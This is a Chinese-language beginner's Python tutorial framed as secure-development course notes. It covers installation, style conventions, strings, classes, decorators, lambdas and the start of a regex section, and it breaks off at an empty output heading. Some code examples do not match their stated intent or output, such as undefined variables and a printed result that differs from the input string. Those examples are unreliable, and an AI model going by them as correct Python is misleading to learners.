Safe: 15-安全开发-python安全开发
- TAGS: Safe
官方文档:https://docs.python.org/zh-cn/3/tutorial/index.html
python 介绍、安装
Python介绍
Python 越来越火爆
Python 在诞生之初,因为其功能不好,运转功率低,不支持多核,根本没有并发性可言,在计算功能不那么好的年代,一直没有火爆起来,甚至很多人根本不知道有这门语言。
随着时代的发展,物理硬件功能不断提高,而软件的复杂性也不断增大,开发效率越来越被企业重视。因此就有了不一样的声音,在软件开发的初始阶段,性能并没有开发效率重要,没必然为了节省不到 1ms 的时间却让开发量增加好几倍,这样划不过来。也就是开发效率比机器效率更为重要,那么 Python 就逐渐得到越来越多开发者的亲睐了。
在 12-14 年,云计算升温,大量创业公司和互联网巨头挤进云计算领域,而最著名的云核算开源渠道 OpenStack就是基于 Python 开发的。
随后几年的备受关注的人工智能,机器学习首选开发语言也是 Python。
至此,Python 已经成为互联网开发的焦点。在「Top 10 的编程语言走势图」可以看到,Python 已经跃居第三位,而且在 2017 年还成为了最受欢迎的语言。
Python 容易入门且功能强大
如果你是一名初学者,学习 Python 就是你最好的选择,因为它容易学,功能强大,很容易就能构建 Web 应用,非常适合初学者作为入门的开发语言。
Python 的安装
因为 Python 是跨平台的,它可以运行在 Windows、Mac 和各种 Linux/Unix 系统上。目前,Python 有两个版本,一个是 2.x 版,一个是 3.x版,这两个版本是不兼容的。本草根安装的是 3.6.1 版本的。
至于在哪里下载,草根我建议大家最好直接官网下载,随时下载下来的都是最新版本。官网地址:https://www.python.org/
windows 系统下安装配置
如果是 windows 系统,下载完后,直接安装,不过这里记得勾上Add Python 3.6 to PATH,然后点 「InstallNow」 即可完成安装。
这里要注意了,记得把「Add Python 3.6 to Path」勾上,勾上之后就不需要自己配置环境变量了,如果没勾上,就要自己手动配置。
如果你一时手快,忘记了勾上 「Add Python 3.6 to Path」,那也不要紧,只需要手动配置一下环境变量就好了。
在命令提示框中 cmd 上输入 :
path=%path%;C:\Python
特别特别注意: C:\Python 是 Python 的安装目录,如果你的安装目录是其他地方,就得填上你对应的目录。
安装完成后,打开命令提示符窗口,敲入 python 后,出现下面的情况,证明 Python 安装成功了。
而你看到提示符 >>> 就表示我们已经在 Python 交互式环境中了,可以输入任何 Python 代码,回车后会立刻得到执行结果。
Mac 系统下安装配置
MAC 系统一般都自带有 Python2.x 版本的环境,不过现在都不用 2.x 的版本了,所以建议你在 https://www.python.org/downloads/mac-osx/ 上下载最新版安装。
安装完成之后,如何配置环境变量呢?
先查看当前环境变量:
echo $PATH
然后打开 ~/.bash_profile(没有请新建)
vi ~/.bash_profile
我装的是 Python3.7 ,Python 执行路径为: /Library/Frameworks/Python. Framework/Versions/3.7/bin。于是写入
export PATH="/Library/Frameworks/Python. Framework/Versions/3.7/bin:$PATH"
最后保存退出,激活运行一下文件:
source ~/.bash_profile
集成开发环境(IDE): PyCharm
PyCharm 下载地址 : https://www.jetbrains.com/pycharm/download/
第一个 Python 程序
现在我们可以来写一下第一个 Python 程序了。
第一个 Python 程序当然是打印 Hello Cici 。
新建一个文件,命名为 main.py , 注意,这里是以 .py 为后缀的文件。
然后打开文件,输入 print('Hello {}'.format(name))
运行结果
代码文件
def print_hi(name): print('Hi, {}'.format(name)) if __name__ == '__main__': print_hi('Cici')
python 基本语法
主要内容:
- 基本数据结构
- 函数
- 条件语句
- 错误与异常处理
- 循环语句
- 面向对象
- 文件输入输出
- 模块
语法规范
2、代码格式
- 缩进
统一使用 4 个空格进行缩进 - 行宽
每行代码尽量不超过 80 个字符(在特殊情况下可以略微超过 80 ,但最长不得超过 120)
理由:
- 方便在控制台下查看代码
- 太长可能是设计有缺陷
- 方便在控制台下查看代码
- 引号
简单说,自然语言使用双引号,机器标示使用单引号,因此 代码里 多数应该使用 单引号
- 自然语言 使用双引号 "…"
例如错误信息;很多情况还是 unicode,使用 u"你好世界" - 机器标识 使用单引号 '…' 例如 dict 里的 key
- 正则表达式 使用原生的双引号 r"…" 如 r"\" 中\原样输出
- 文档字符串 (docstring) 使用三个双引号 """……"""
- 自然语言 使用双引号 "…"
空行
- 模块级函数和类定义之间空两行;
- 类成员函数之间空一行;
class A: def __init__(self): pass def hello(self): pass def main(): pass
- 可以使用多个空行分隔多组相关的函数
- 函数中可以使用空行分隔出逻辑相关的代码
- 模块级函数和类定义之间空两行;
3、import 语句
import 语句应该分行书写
# 正确的写法 import os import sys # 不推荐的写法,不同模块不建议放在一起写 import sys,os # 正确的写法。同模块内导入放一起写 from subprocess import Popen, PIPE
import语句应该使用 absolute import
# 正确的写法 from foo.bar import Bar # 不推荐的写法 from ..bar import Bar
import语句应该放在文件头部,置于模块说明及docstring之后,于全局变量之前;
import语句应该按照顺序排列,每组之间用一个空行分隔
import os import sys import msgpack import zmq import foo
导入其他模块的类定义时,可以使用相对导入
from myclass import MyClass
如果发生命名冲突,则可使用命名空间
import bar import foo.bar bar.Bar() foo.bar.Bar()
4、空格
在二元运算符两边各空一格 [=,-,+=,==,>,in,is not, and] :
# 正确的写法 i = i + 1 submitted += 1 x = x * 2 - 1 hypot2 = x * x + y * y c = (a + b) * (a - b) # 不推荐的写法 i=i+1 submitted +=1 x = x*2 - 1 hypot2 = x*x + y*y c = (a+b) * (a-b)
函数的参数列表中, , 之后要有空格
# 正确的写法 def complex(real, imag): pass # 不推荐的写法 def complex(real,imag): pass
函数的参数列表中,默认值等号两边不要添加空格
# 正确的写法 def complex(real, imag=0.0): pass # 不推荐的写法 def complex(real, imag = 0.0): pass
左括号之后,右括号之前不要加多余的空格
# 正确的写法 spam(ham[1], {eggs: 2}) # 不推荐的写法 spam( ham[1], { eggs : 2 } )
字典对象的左括号之前不要多余的空格
# 正确的写法 dict['key'] = list[index] # 不推荐的写法 dict ['key'] = list [index]
不要为对齐赋值语句而使用的额外空格
# 正确的写法 x = 1 y = 2 long_variable = 3 # 不推荐的写法 x = 1 y = 2 long_variable = 3
5、换行
Python 支持括号内的换行。这时有两种情况。
- 第二行缩进到括号的起始处
foo = long_function_name(var_one, var_two,
var_three, var_four)
- 第二行缩进 4 个空格,适用于起始括号就换行的情形
def long_function_name( var_one, var_two, var_three, var_four): print(var_one)
使用反斜杠 \ 换行,二元运算符 + . 等应出现在行末;长字符串也可以用此法换行
session.query(MyTable).\ filter_by(id=1).\ one() print 'Hello, '\ '%s %s!' %\ ('Harry', 'Potter')
禁止复合语句,即一行中包含多个语句:
# 正确的写法 do_first() do_second() do_third() # 不推荐的写法 do_first();do_second();do_third();
if/for/while 一定要换行:
# 正确的写法 if foo == 'blah': do_blah_thing() # 不推荐的写法 if foo == 'blah': do_blash_thing()
6、docstring
docstring 的规范中最其本的两点:
- 所有的公共模块、函数、类、方法,都应该写 docstring 。私有方法不一定需要,但应该在 def 后提供一个块注释来说明。
- docstring 的结束"""应该独占一行,除非此 docstring 只有一行。
"""Return a foobar Optional plotz says to frobnicate the bizbaz first. """ """Oneline docstring"""
注释
注释
块注释
“#”号后空一格,段落件用空行分开(同样需要“#”号)
# 块注释 # 块注释 # # 块注释 # 块注释
行注释
至少使用两个空格和语句分开,注意不要使用无意义的注释
# 正确的写法 x = x + 1 # 边框加粗一个像素 # 不推荐的写法(无意义的注释) x = x + 1 # x加1
建议
- 在代码的关键部分(或比较复杂的地方), 能写注释的要尽量写注释
- 比较重要的注释段, 使用多个等号隔开, 可以更加醒目, 突出重要性
app = create_app(name, options) # ===================================== # 请勿在此处添加 get post等app路由行为 !!! # ===================================== if __name__ == '__main__': app.run()
文档注释(Docstring)
作为文档的Docstring一般出现在模块头部、函数和类的头部,这样在python中可以通过对象的doc对象获取文档。编辑器和IDE也可以根据Docstring给出自动提示。
文档注释以 """ 开头和结尾, 首行不换行, 如有多行, 末行必需换行, 以下是Google的docstring风格示例
# -*- coding: utf-8 -*- """Example docstrings. This module demonstrates documentation as specified by the `Google Python Style Guide`_. Docstrings may extend over multiple lines. Sections are created with a section header and a colon followed by a block of indented text. Example: Examples can be given using either the ``Example`` or ``Examples`` sections. Sections support any reStructuredText formatting, including literal blocks:: $ python example_google.py Section breaks are created by resuming unindented text. Section breaks are also implicitly created anytime a new section starts. """
不要在文档注释复制函数定义原型, 而是具体描述其具体内容, 解释具体参数和返回值等
# 不推荐的写法(不要写函数原型等废话) def function(a, b): """function(a, b) -> list""" ... ... # 正确的写法 def function(a, b): """计算并返回a到b范围内数据的平均值""" ... ...
对函数参数、返回值等的说明采用numpy标准, 如下所示
def func(arg1, arg2): """在这里写函数的一句话总结(如: 计算平均值). 这里是具体描述. 参数 ---------- arg1 : int arg1的具体描述 arg2 : int arg2的具体描述 返回值 ------- int 返回值的具体描述 参看 -------- otherfunc : 其它关联函数等... 示例 -------- 示例使用doctest格式, 在`>>>`后的代码可以被文档测试工具作为测试用例自动运行 >>> a=[1,2,3] >>> print [x + 3 for x in a] [4, 5, 6] """
文档注释不限于中英文, 但不要中英文混用
文档注释不是越长越好, 通常一两句话能把情况说清楚即可
模块、公有类、公有方法, 能写文档注释的, 应该尽量写文档注释
命名规范
1、模块
模块尽量使用小写命名,首字母保持小写,尽量不要用下划线(除非多个单词,且数量不多的情况)
# 正确的模块名 import decoder import html_parser # 不推荐的模块名 import Decoder
2、类名
类名使用驼峰(CamelCase)命名风格,首字母大写,私有类可用一个下划线开头
class Farm(): pass class AnimalFarm(Farm): pass class _PrivateFarm(Farm): pass
将相关的类和顶级函数放在同一个模块里. 不像Java, 没必要限制一个类一个模块.
3、函数
函数名一律小写,如有多个单词,用下划线隔开
def run(): pass def run_with_env(): pass
私有函数在函数前加一个下划线_
class Person(): def _private_func(): pass
4、变量名
变量名尽量小写, 如有多个单词,用下划线隔开
if __name__ == '__main__': count = 0 school_name = ''
常量采用全大写,如有多个单词,使用下划线隔开
MAX_CLIENT = 100 MAX_CONNECTION = 1000 CONNECTION_TIMEOUT = 600
5、常量
常量使用以下划线分隔的大写命名
MAX_OVERFLOW = 100 Class FooBar: def foo_bar(self, print_): print(print_)
Python字符串
字符串字面量
python 中的字符串字面量由单引号或双引号括起。
'hello Cici' 等于 "hello Cici"。
我们可以使用 print() 函数显示字符串字面量:
实例
print("Hello Cici") print('Hello Cici')
用字符串向变量赋值
通过使用变量名称后跟等号和字符串,可以把字符串赋值给变量:
实例
a = "Hello Cici" print(a)
多行字符串
您可以使用三个引号将多行字符串赋值给变量:
实例
您可以使用三个双引号:
cici = """linux archlinux.""" print(cici)
或三个单引号:
实例
cici = '''abc def aaaaaa.''' print(cici)
字符串是数组
像许多其他流行的编程语言一样,Python 中的字符串是表示 unicode 字符的字节数组。
但是,Python 没有字符数据类型,单个字符就是长度为 1 的字符串。
方括号可用于访问字符串的元素。
实例
获取位置 1 处的字符(请记住第一个字符的位置为 0):
cici = "Hello, World!" print(a[1])
裁切
您可以使用裁切语法返回一定范围的字符。
指定开始索引和结束索引,以冒号分隔,以返回字符串的一部分。
实例- 获取从位置 3 到位置 5(不包括)的字符:
b = "Hello, World!" print(b[3:5])
负的索引
使用负索引从字符串末尾开始切片:
实例-获取从位置 5 到位置 3 的字符,从字符串末尾开始计数:
b = "Hello, World!" print(b[-5:-3])
字符串长度
如需获取字符串的长度,请使用 len() 函数。
实例-len() 函数返回字符串的长度:
a = "Hello, Cici!" print(len(a))
字符串方法
Python 有一组可用于字符串的内置方法。
实例-strip() 方法删除开头和结尾的空白字符:
a = " Hello, Cici! " print(a.strip()) # returns "Hello, Cici!"
实例- lower() 返回小写的字符串:
a = "Hello, Cici!" print(a.lower())
实例-upper() 方法返回大写的字符串:
a = "Hello, Cici!" print(a.upper())
实例-replace() 用另一段字符串来替换字符串:
a = "Hello, Cici!" print(a.replace("World", "Kitty"))
实例-split() 方法在找到分隔符的实例时将字符串拆分为子字符串:
a = "Hello, Cici!" print(a.split(",")) # returns ['Hello', ' Cici!']
请使用我们的字符串方法参考手册,学习更多的字符串方法。
检查字符串
如需检查字符串中是否存在特定短语或字符,我们可以使用 in 或 not in 关键字。
检查以下文本中是否存在短语 "Cici":
txt = "Cici is a great company" x = "edu" in txt print(x)
检查以下文本中是否没有短语 "Cici":
txt = "Cici is a great company" x = "edu" not in txt print(x)
字符串级联(串联)
如需串联或组合两个字符串,您可以使用 + 运算符。
实例-将变量 a 与变量 b 合并到变量 c 中:
a = "Hello" b = "Cici" c = a + b print(c)
实例-在它们之间添加一个空格:
a = "Hello" b = "Cici" c = a + " " + b print(c)
字符串格式
正如在 Python 变量一章中所学到的,我们不能像这样组合字符串和数字:
实例
age = 100 txt = "My name is cici, I am " + age print(txt)
但是我们可以使用 format() 方法组合字符串和数字!
format() 方法接受传递的参数,格式化它们,并将它们放在占位符 {} 所在的字符串中:
实例-使用 format() 方法将数字插入字符串:
age = 100 txt = "My name is Cici, and I am {} years old" print(txt.format(age))
format() 方法接受不限数量的参数,并放在各自的占位符中:
实例
quantity = 3 itemno = 567 price = 49.95 myorder = "I want {} pieces of item {} for {} dollars." print(myorder.format(quantity, itemno, price))
可以使用索引号 {0} 来确保参数被放在正确的占位符中:
实例
quantity = 300 itemno = 567 price = 49.95 myorder = "I want to pay {2} dollars for {0} pieces of item {1}." print(myorder.format(quantity, itemno, price))
Python 用作计算器
https://docs.python.org/zh-cn/3/tutorial/introduction.html#using-python-as-a-calculator
现在,尝试一些简单的 Python 命令。启动解释器,等待主提示符( >>> )出现。
print() 函数
这里先说一下 print() 函数,如果你是新手,可能对函数不太了解,没关系,在这里你只要了解它的组成部分和作用就可以了,后面函数这一块会详细说明的。
print() 函数由两部分构成 :
- 指令:print
- 指令的执行对象,在 print 后面的括号里的内容
而 print() 函数的作用是让计算机把你给它的指令结果,显示在屏幕的终端上。这里的指令就是你在 print()函数里的内容。
它的执行流程如下:
- 向解释器发出指令,打印 'Hello Cici'
- 解析器把代码解释为计算器能读懂的机器语言
- 计算机执行完后就打印结果
print()的参数
- sep 指定分隔符,默认空格
- end 指定尾部字符,默认换行
print("Cici", "Web安全", sep='--')
运行结果
Cici--网络安全
- 格式化输出
name = "Cici" age = 10 gender = "男" print("%s++%s++%s" %(name,age,gender))
运行结果
Cici++10++男
- format使用
name = "test" age = 10 gender = "男" print("我叫{0}今年{1}岁是个{2}".format(name,age,gender)) print("我叫{2}今年{0}岁是个{1}".format(name,age,gender))
运行结果
我叫test今年10岁是个男 我叫男今年test岁是个10
类
其他
类的call
Python中,如果在创建class的时候写了call()方法, 那么该class实例化出实例后, 实例名()就是调用call()方法。
class test(): def __call__(self, *args, **kwargs): print("test") t = test() t()
运行结果
test
classmethod
classmethod 修饰符对应的函数不需要实例化,不需要 self 参数,但第一个参数需要是表示自身类的 cls 参数,可以来调用类的属性,类的方法,实例化对象等。 不需要实例化的意思是不创建对象,比如a = A()
#!/usr/bin/python # -*- coding: UTF-8 -*- class A(object): bar = 1 def func1(self): print ('foo') @classmethod def func2(cls): print ('func2') print (cls.bar) cls().func1() # 调用 foo 方法 A.func2() # 不需要实例化
运行结果
func2 1 foo
staticmethod
对比classmethod,staticmethod没有参数
#!/usr/bin/python # -*- coding: UTF-8 -*- class C(object): @staticmethod def f(): print('runoob'); C.f(); # 静态方法无需实例化 cobj = C() cobj.f() # 也可以实例化后调用
运行结果
runoob runoob
proprety
#普通的get和set私有化age,__的变量就是私有化,私有化变量外部不能直接访问 class Test(): def __init__(self,name,age): self.name = name self.__age = age def getAge(self): return self.__age def setAge(self,age): self.__age = age class Test1(): def __init__(self,name,age): self.name = name self.__age = age @property def age(self): return self.__age #设置方法 @age.setter def age(self,age): self.__age = age t = Test("name",20) print(t.getAge()) t.setAge(30) print(t.getAge()) #简单来说,这装饰器的作用就是调用函数变成调用变量,从不能调用私有化变量,直接用一个变量代替 t1 = Test1("name",20) print(t1.age) t1.age = 30 print(t1.age)
运行结果
20 30 20 30
装包,拆包
#装包 装包就是把未命名的参数放到元组中,把命名参数放到字典中 a = 1, 2 print(a) (1, 2) #拆包将一个结构中的数据拆分为多个单独变量中 *args **kwargs def run1(*args): # *args 相当于 a, b, c = args print(*args) # 拆包 1, 2, 3 print(args) # 未拆包 (1, 2, 3) run2(*args) # 将拆包数据传给run2 run2(args) # 将未拆包数据传给run2 def run2(*args): print(args) # 打印包 print(*args) # 打印拆包后的数据 a, b, c = 1, 2, 3 run1(a, b, c) 1 2 3 (1, 2, 3) (1, 2, 3) 1 2 3
闭包
请大家跟我理解一下,如果在一个函数的内部定义了另一个函数,外部的我们叫他外函数,内部的我们叫他内函数。
闭包: 在一个外函数中定义了一个内函数,内函数里运用了外函数的临时变量,并且外函数的返回值是内函数的引用。这样就构成了一个闭包。 一般情况下,在我们认知当中,如果一个函数结束,函数的内部所有东西都会释放掉,还给内存,局部变量都会消失。但是闭包是一种特殊情况,如果外函数在结束的时候发现有自己的临时变量将来会在内部函数中用到,就把这个临时变量绑定给了内部函数,然后自己再结束。
#闭包函数的实例 # outer是外部函数 a和b都是外函数的临时变量 def outer( a ): b = 10 # inner是内函数 def inner(): #在内函数中 用到了外函数的临时变量 print(a+b) # 外函数的返回值是内函数的引用 return inner if __name__ == '__main__': # 在这里我们调用外函数传入参数5 #此时外函数两个临时变量 a是5 b是10 ,并创建了内函数,然后把内函数的引用返回存给了demo # 外函数结束的时候发现内部函数将会用到自己的临时变量,这两个临时变量就不会释放,会绑定给这个内部函数 demo = outer(5) # 我们调用内部函数,看一看内部函数是不是能使用外部函数的临时变量 # demo存了外函数的返回值,也就是inner函数的引用,这里相当于执行inner函数 demo() # 15 demo2 = outer(7) demo2()#17
*args 和 **kwargs ?
考虑一种情况,我们必须编写多个函数只是为了接受不同数量的参数。
例如以下 add Python中的方法:
def add(a, b): return a+b def add(a, b, c, d, e, f): return a+b+c+d+e+f print(add(5,6)) #output 11 print(add(5, 6, 1, 5, 2, 2)) #output 21
请注意,我们必须编写两个重载函数来添加不同数量的参数。
每次参数数量不同时,我们都需要编写一个与之对应的特定函数。
我们可以解决这个问题的一种方法是使用 列表 作为参数来接受多个整数,如下所示:
def add(lst): return sum(lst) print(add([5, 6, 1, 5, 2, 2])) #output 21
虽然这解决了问题,但它仍然改变了我们想要使用该功能的方式。
还有另一种方法可以使 Python 中的函数在参数方面更加灵活,那就是使用 *args 和 **kwargs 。
什么是 *args 和 **kwargs?
*args
和 **kwargs
是 Python 中的关键字,当定义为参数时,允许函数接受不同数量的参数。
当我们不确定特定函数的参数数量时,它们很有用。
它们都使函数在参数方面具有灵活性,但它们彼此略有不同。 让我们看看两者的例子。
*args 在 Python 中是一个 非关键字参数 ,它可以接受和存储可变数量的位置参数作为 元组 。
位置参数是一个不跟等号 (=) 和默认值的名称。
def add(*args): print(sum(args)) add() #0-arguments add(5, 6, 4) #3-arguments add(1, 1, 1, 1, 1) #5-arguments
*args 可以接受可变数量的参数(甚至是 0 个参数),从而使函数更加灵活。
如果我们不使用 *args ,我们必须为每个函数调用定义单独的函数。
我们可以重命名 *args 吗?
我们可以。 这是因为 args 在 *args 只是一个名字,更重要的是 * .
*
在 *args
是一个解包运算符,将传入的参数转换为 Python 元组。
保持 *
操作符,我们可以重命名 args 任何名称,如下所示 :
def add(*integers): print(sum(integers)) add(-1, 7, 2, 6) #output 14
Python中的kwargs
**kwargs
在 Python 中是一个 关键字参数 ,它可以接受和存储不同类型的关键字参数作为 字典 。
关键字参数(也称为命名参数)后跟一个等号和一个给出其默认值的表达式。
当我们希望函数接受不同数量的参数并且同时也不确定它们的类型时,它很有用。
考虑以下代码,其中一个函数接受两个不同类型的不同关键字参数:
def student(name="", roll=-1): print(name) #output: pencil print(roll) #output: 77 student(name="pencil", roll=77)
在这里,我们可以使用 **kwargs 使函数在关键字参数方面更加灵活,如下所示:
def student(**kwargs): print(kwargs['name']) #output: pencil print(kwargs['roll']) #output: 77 student(name="pencil", roll=77, department="IT")
我们已经将一个额外的关键字参数(即部门)传递给 student 功能,但代码工作正常。
和 *args 一样,在 **kwargs 中我们可以重命名 kwargs .
重要的部分是 =**=(解包操作符),它应该在名称之前。
装饰器
装饰器是一个在另一个函数周围创建包装器的函数。 这个包装器为现有代码添加了一些额外的功能。
装饰器也是一个函数,它是让其他函数在不改变变动的前提下增加额外的功能。
装饰器是一个闭包,把一个函数当作参数返回一个替代版的函数,本质是一个返回函数的函数(即返回值为函数对象)。
python3支持用@符号直接将装饰器应用到函数。
装饰器工作场景:插入日志、性能测试、事务处理等等。
函数被装饰器装饰过后,此函数的属性均已发生变化,如名称变为装饰器的名称。
# funcEx.py def addOne(myFunc): def addOneInside(x): print("adding One") return myFunc(x) + 1 return addOneInside def subThree(x): return x - 3 result = addOne(subThree) print(subThree(5)) print(result(5)) # outputs # 2 # adding One # 3
上面的代码工作如下,
- 函数“subThree”在第 9-10 行定义,它用 3 减去给定的数字。
- 函数'addOne'(第3 行)有一个参数,即myFunc,它表明'addOne' 将函数作为输入。 由于 subThree 函数只有一个输入参数,因此在函数“addOneInside”中设置了一个参数(第 4 行); 用于 return 语句(第 6行)。 此外,在返回值之前打印“加一”(第 5 行)。
- 在第12 行,addOne 的返回值(即函数'addOneInside')存储在'result' 中。 因此,“结果”是一个接受一个输入的函数。
- 最后,在第 13 行和第 14 行打印值。请注意,“加一”由 result(5) 打印,并且值增加 1,即 2 到 3。
二层装饰器,也就是没有装饰器没有参数
import time def dec1(func): print("开始ing") time.sleep(3) def wrapper(*args,**kwargs): func(*args,**kwargs) print("到达装饰器里面") return wrapper @dec1 def f1(): print("我是f1")
运行结果
开始ing 我是f1 到达装饰器里面
三层装饰器,有参数的装饰器
import time def outer(a): def dec1(func): print("开始ing") time.sleep(3) def wrapper(*args,**kwargs): func(*args,**kwargs) print("到达装饰器里面",a) return wrapper return dec1 @outer(10) def f1(): print("我是f1")
运行结果
开始ing 我是f1 到达装饰器里面 10
匿名函数
s = lambda a,b:a+b print(s) print(s(1,2)) #map+匿名函数 lists = [1,3,5,7,9] result = map(lambda x:x*x,lists) print(result) print(list(result)) #if+匿名函数 func = lambda x:x if x==10 else x+1 print(func(10)) print(func(11)) func = lambda x:print("大于10") if x>10 else print("少于10") print(func(11)) print(func(2)) #filter+匿名函数 result = list(filter(lambda x:x>5, lists)) print(result) #reduce +匿名函数 from functools import reduce # reduce 函数可以按照给定的方法把输入参数中上序列缩减为单个的值,具体的做法如下: # 首先从序列中去除头两个元素并把它传递到那个二元函数中去,求出一个值,再把这个加到序列中循环求下一个值,直到最后一个值 。 result = reduce(lambda x,y:x*y, [1,2,3,4,5] )#((((1*2)*3)*4)*5 print(result)
运行结果
<function <lambda> at 0x00000285FDBC3E18> 3 <map object at 0x00000285FDF312B0> [1, 9, 25, 49, 81] 10 12 大于10 None 少于10 None [7, 9] 120
python 安全应用编程入门
主要内容:
- python 正则表达式
- python 网络编程
- python web 编程
- python 数据库编程
- python 多线程
Python 正则表达式
perl文官正则: https://perldoc.perl.org/perlre
基础正则表达式: https://www.cnblogs.com/f-ck-need-u/p/9621130.html
Perl正则表达式超详细教程: https://www.cnblogs.com/f-ck-need-u/p/9648439.html
vs code 中.NET正则: https://learn.microsoft.com/en-us/dotnet/standard/base-types/regular-expressions
grep 中正则: https://www.gnu.org/software/grep/manual/grep.html#Regular-Expressions
python re正则表达式: https://docs.python.org/zh-cn/3/library/re.html
正则表达式,Regular Expression,缩写为regex、regexp、RE等。
正则表达式是文本处理极为重要的技术,用它可以对字符串按照某种规则进行检索、替换。
1970年代,Unix之父Ken Thompson将正则表达式引入到Unix中文本编辑器ed和grep命令中,由此正则表达式普及开来。
1980年后,perl语言对Henry Spencer编写的库,扩展了很多新的特性。1997年开始,Philip Hazel开发出了PCRE(Perl Compatible Regular Expressions),它被PHP和HTTPD等工具采用。
正则表达式应用极其广泛,shell中处理文本的命令、各种高级编程语言都支持正则表达式。
参考 https://www.w3cschool.cn/regex_rmjc/
正则表达式是一个特殊的字符序列,用于判断一个字符串是否与我们所设定的字符序列是否匹配,也就是说检查一个字符串是否与某种模式匹配。
正则表达式可以包含普通或者特殊字符。绝大部分普通字符,比如 'A' , 'a' , 或者 '0' ,都是最简单的正则表达式。它们就匹配自身。你可以拼接普通字符,所以 cici 匹配字符串 'cici' .
一些字符,如 '|'
or '('
,是特殊的。特殊字符要么代表普通字符的类别,要么影响它们周围的正则表达式的解释方式。正则表达式模式字符串可能不包含空字节,但可以使用 \number 符号指定空字节,例如 '\x00' .
重复修饰符 ( * , + , ? , {m,n} , 等) 不能直接嵌套。这样避免了非贪婪后缀 ? 修饰符,和其他实现中的修饰符产生的多义性。要应用一个内层重复嵌套,可以使用括号。 比如,表达式 (?:a{6})*
匹配6个 'a' 字符重复任意次数。
基本语法
转义
凡是在正则表达式中有特殊意义的符号,如果想使用它的本意,请使用\转义。
反斜杠自身,得使用
\r、\n还是转义后代表回车、换行
重复
https://www.cnblogs.com/f-ck-need-u/p/9621130.html#%E5%85%83%E5%AD%97%E7%AC%A6
比如在一段字符串中寻找是否含有某个字符或某些字符,通常我们使用内置函数来实现,如下:
# 设定一个常量 a = 'CiCi|twowater|liangdianshui|网络安全|ReadingWithU' # 判断是否有 “CiCi” 这个字符串,使用 PY 自带函数 print('是否含有“CiCi”这个字符串:{0}'.format(a.index('CiCi') > -1)) print('是否含有“CiCi”这个字符串:{0}'.format('CiCi' in a))
输出的结果如下:
是否含有“CiCi”这个字符串:True 是否含有“CiCi”这个字符串:True
那么,如果使用正则表达式呢?
刚刚提到过,Python 给我们提供了 re 模块来实现正则表达式的所有功能,那么我们先使用其中的一个函数:
re.findall(pattern, string[, flags])
该函数实现了在字符串中找到正则表达式所匹配的所有子串,并组成一个列表返回,具体操作如下:
import re # 设定一个常量 a = 'CiCi|twowater|liangdianshui|网络安全|ReadingWithU' # 正则表达式 findall = re.findall('CiCi', a) print(findall) if len(findall) > 0: print('a 含有“CiCi”这个字符串') else: print('a 不含有“CiCi”这个字符串')
输出的结果:
['CiCi']
a 含有“CiCi”这个字符串
从输出结果可以看到,可以实现和内置函数一样的功能,可是在这里也要强调一点,上面这个例子只是方便我们理解正则表达式,这个正则表达式的写法是毫无意义的。为什么这样说呢?
因为用 Python 自带函数就能解决的问题,我们就没必要使用正则表达式了,这样做多此一举。而且上面例子中的正则表达式设置成为了一个常量,并不是一个正则表达式的规则,正则表达式的灵魂在于规则,所以这样做意义不大。
那么正则表达式的规则怎么写呢?先不急,我们一步一步来,先来一个简单的,找出字符串中的所有小写字母。首先我们在 findall 函数中第一个参数写正则表达式的规则,其中 [a-z] 就是匹配任何小写字母,第二个参数只要填写要匹配的字符串就行了。具体如下:
import re # 设定一个常量 a = 'CiCi|twowater|liangdianshui|网络安全|ReadingWithU' # 选择 a 里面的所有小写英文字母 re_findall = re.findall('[a-z]', a) print(re_findall)
输出的结果:
['i', 'i', 't', 'w', 'o', 'w', 'a', 't', 'e', 'r', 'l', 'i', 'a', 'n', 'g', 'd', 'i', 'a', 'n', 's', 'h', 'u', 'i', 'e', 'a', 'd', 'i', 'n', 'g', 'i', 't', 'h']
这样我们就拿到了字符串中的所有小写字母了。
或
x|y 匹配x或者y
wood took foot food 使用 w|food 或者 (w|f)ood
捕获
- (pattern)
使用小括号指定一个子表达式,也叫分组
捕获后会自动分配组号从1开始可以改变优先级 - \数字
匹配对应的分组
例: (very) \1 匹配very very,但捕获的组group是very - (?:pattern)
如果仅仅为了改变优先级,就不需要捕获分组
例:
(?:w|f)ood
'industr(?:y|ies)等价 'industry|industries' - (?<name>exp) (?'name'exp)
命名分组捕获,但是可以通过name访问分组
Python语法必须是(?P<name>exp)
字符集
字符集是由一对方括号 “[]” 括起来的字符集合。使用字符集,可以匹配多个字符中的一个。
举个例子,比如你使用 C[ET]O 匹配到的是 CEO 或 CTO ,也就是说 [ET] 代表的是一个 E 或者一个 T 。像上面提到的 [a-z] ,就是所有小写字母中的其中一个,这里使用了连字符 “-” 定义一个连续字符的字符范围。当然,像这种写法,里面可以包含多个字符范围的,比如: [0-9a-fA-F] ,匹配单个的十六进制数字,且不分大小写。注意了,字符和范围定义的先后顺序对匹配的结果是没有任何影响的。
其实说了那么多,只是想证明,字符集一对方括号 “[]” 里面的字符关系是"或(OR)"关系,下面看一个例子:
import re a = 'uav,ubv,ucv,uwv,uzv,ucv,uov' # 字符集 # 取 u 和 v 中间是 a 或 b 或 c 的字符 findall = re.findall('u[abc]v', a) print(findall) # 如果是连续的字母,数字可以使用 - 来代替 l = re.findall('u[a-c]v', a) print(l) # 取 u 和 v 中间不是 a 或 b 或 c 的字符 re_findall = re.findall('u[^abc]v', a) print(re_findall)
输出的结果:
['uav', 'ubv', 'ucv', 'ucv'] ['uav', 'ubv', 'ucv', 'ucv'] ['uwv', 'uzv', 'uov']
在例子中,使用了取反字符集,也就是在左方括号 “[” 后面紧跟一个尖括号 “^”,就会对字符集取反。需要记住的一点是,取反字符集必须要匹配一个字符。比如: q[^u] 并不意味着:匹配一个 q,后面没有 u 跟着。它意味着:匹配一个 q,后面跟着一个不是 u 的字符。具体可以对比上面例子中输出的结果来理解。
我们都知道,正则表达式本身就定义了一些规则,比如 \d ,匹配所有数字字符,其实它是等价于 [0-9],下面也写了个例子,通过字符集的形式解释了这些特殊字符。
import re a = 'uav_ubv_ucv_uwv_uzv_ucv_uov&123-456-789' # 概括字符集 # \d 相当于 [0-9] ,匹配所有数字字符 # \D 相当于 [^0-9] , 匹配所有非数字字符 findall1 = re.findall('\d', a) findall2 = re.findall('[0-9]', a) findall3 = re.findall('\D', a) findall4 = re.findall('[^0-9]', a) print(findall1) print(findall2) print(findall3) print(findall4) # \w 匹配包括下划线的任何单词字符,等价于 [A-Za-z0-9_] findall5 = re.findall('\w', a) findall6 = re.findall('[A-Za-z0-9_]', a) print(findall5) print(findall6)
输出结果:
